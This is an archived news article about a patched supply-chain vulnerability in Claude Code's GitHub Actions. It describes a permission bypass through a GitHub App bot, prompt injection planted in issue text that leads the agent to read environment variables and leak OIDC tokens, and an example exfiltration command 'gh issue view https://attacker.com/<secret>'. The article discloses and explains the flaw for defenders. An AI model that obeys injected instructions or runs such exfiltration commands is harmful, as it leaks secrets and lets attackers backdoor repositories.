CyberIntel ⬡ News
★ Saved ◆ Cyber Reads
← Back ◇ Industry News & Leadership Jun 02, 2026

Claude Code’s GitHub Actions Vulnerability Lets Attackers Compromise Any Repository

Cybersecurity News Archived Jun 02, 2026 ✓ Full text saved

A critical supply chain vulnerability in Claude Code’s GitHub Actions that could allow attackers to compromise any repository using Anthropic’s official CI/CD workflow, including Anthropic’s own infrastructure. The vulnerability, discovered by security researcher RyotaK of GMO Flatt Security and patched in Claude Code GitHub Actions v1.0.94, stems from a flawed permission model in the checkWritePermissions […] The post Claude Code’s GitHub Actions Vulnerability Lets Attackers Compromise Any Repo

Full text archived locally
✦ AI Summary · Claude Sonnet


    HomeCyber Security News Claude Code’s GitHub Actions Vulnerability Lets Attackers Compromise Any Repository By Guru Baran June 2, 2026 A critical supply chain vulnerability in Claude Code’s GitHub Actions that could allow attackers to compromise any repository using Anthropic’s official CI/CD workflow, including Anthropic’s own infrastructure. The vulnerability, discovered by security researcher RyotaK of GMO Flatt Security and patched in Claude Code GitHub Actions v1.0.94, stems from a flawed permission model in the checkWritePermissions function. When combined with prompt injection techniques, it could enable a fully unauthenticated external attacker to exfiltrate secrets, steal OIDC tokens, and push malicious code to any downstream repository that depends on the Claude Code GitHub Actions workflow. Claude Code GitHub Actions restricts workflow execution to users with write or admin access. However, the checkWritePermissions function unconditionally trusted any actor ending in [bot] regardless of actual permissions. Since GitHub Apps have implicit read access to public repositories and can create issues or pull requests on any public repo using only an installation token, an attacker could bypass this control entirely. Claude Code’s GitHub Actions Vulnerability The attack required just three steps: create a malicious GitHub App, install it on any attacker-controlled repository (no special permissions needed), and use its installation token to open an issue or pull request in the target repository. Because the actor appeared as a GitHub App bot, the permission check returned true and the workflow processed the attacker-controlled content. While tag mode had an additional checkHumanActor check, agent mode lacked this safeguard at the time of discovery. Once the bypass was achieved, the attacker could craft a malicious issue description containing a fake error message to trick Claude Code into executing embedded commands, a classic prompt injection attack. Claude Code permits certain Bash commands (such as cat and head) without explicit user approval, allowing an attacker to read /proc/self/environ, a Linux pseudo-file exposing all environment variables passed to the workflow process. Among those environment variables, the most sensitive are ACTIONS_ID_TOKEN_REQUEST_TOKEN and ACTIONS_ID_TOKEN_REQUEST_URL — the credentials used to request an OpenID Connect (OIDC) token from GitHub Actions. Claude Code GitHub Actions uses this OIDC token to obtain a privileged Claude GitHub App installation token from Anthropic’s backend via https://api.anthropic.com/api/github/github-app-token-exchange. With these exfiltrated credentials, an attacker could replicate the entire token exchange process and obtain a GitHub App token with write access to repository contents, issues, pull requests, and workflows. The mcp__github__update_issue MCP tool permitted in Anthropic’s own issue triage workflow was then abused to write the stolen secrets back into a public issue, where the attacker could simply read them. The most severe consequence was that the anthropics/claude-code-action repository itself used a vulnerable agent mode workflow. A successful exploit would allow an attacker to inject malicious code directly into the action’s source, which would then propagate to every downstream repository depending on it a classic supply chain attack. In total, the full attack chain involved seven steps: from creating a rogue GitHub App to pushing backdoored code to Anthropic’s own repository. Separately, RyotaK identified a misconfiguration in Anthropic’s official example workflows using allowed_non_write_users: "*". When combined with issues: write permissions and a second workflow using id-token: write, an external attacker could chain the two workflows: use the triage workflow to steal a GITHUB_TOKEN via Claude’s publicly visible workflow run summary, then edit an existing issue to inject prompts into the tag-mode workflow ultimately escalating to full repository compromise without ever needing the GitHub App bypass. Notably, even the gh issue view CLI command was weaponizable for exfiltration; prompt injection could instruct Claude to embed secrets in URL path arguments (e.g., gh issue view https://attacker.com/<secret>), sending credentials to an external server. Anthropic addressed the vulnerabilities in Claude Code GitHub Actions v1.0.94. Fixes included adding a checkHumanActor call to agent mode, disabling the workflow run summary section by default, scrubbing environment variables from child processes spawned by Claude Code, and implementing a custom gh command wrapper that validates arguments and blocks exfiltration-capable URL patterns. Anthropic also added logic to ignore issues and comments edited after a workflow is triggered, closing the workflow-chaining attack vector. The researcher rated the vulnerabilities at CVSS v4.0 score of 7.8. Anthropic awarded $3,800 plus a $1,000 bonus through its bug bounty program Users still running Claude Code GitHub Actions are advised to audit any workflow using allowed_non_write_users, restrict exposed secrets to only the Anthropic API key and GITHUB_TOKEN, and review workflow run logs for indicators of compromise. Free Webinar on OWASP API Top 10 and Guide to Close Visibility Gaps With WAAP Tags cyber security cyber security news vulnerability Copy URL Linkedin Twitter ReddIt Telegram Guru Baranhttps://cybersecuritynews.com Gurubaran KS is a cybersecurity analyst, and Journalist with a strong focus on emerging threats and digital defense strategies. He is the Co-Founder and Editor-in-Chief of Cyber Security News, where he leads editorial coverage on global cybersecurity developments. Trending News Windows Server 2016 Domain Controller May Fail with 15-Character Hostname GitHub Enterprise Server 3.20.3 Released With Fox for Critical Vulnerabilities Attackers Abuse Open RDP Ports to Gain Initial Access Into Business Networks Attackers Can Exploit BadHost to Access Sensitive AI Agent Server Endpoints Hackers Use Meta’s AI Bot to Reset Passwords and Hijack Instagram Accounts Latest News API Web App and API Attacks are Rising: Are You Blind to AI Web Attacks? Join Free WAAP Security Webinar  Cyber Security News PHANTOMPULSE RAT Uses Process Injection and UAC Bypass to Compromise Windows Systems Cyber Security News Nimbus Manticore APT Abuses Fake Recruitment Portal to Deliver Custom Malware Android Android 0-Day Vulnerability Exploited in Attacks to Gain Complete Device Control Cyber Security News Critical StrongDM Vulnerability Allows Attackers to Steal and Reuse Authentication
    💬 Team Notes
    Article Info
    Source
    Cybersecurity News
    Category
    ◇ Industry News & Leadership
    Published
    Jun 02, 2026
    Archived
    Jun 02, 2026
    Full Text
    ✓ Saved locally
    Open Original ↗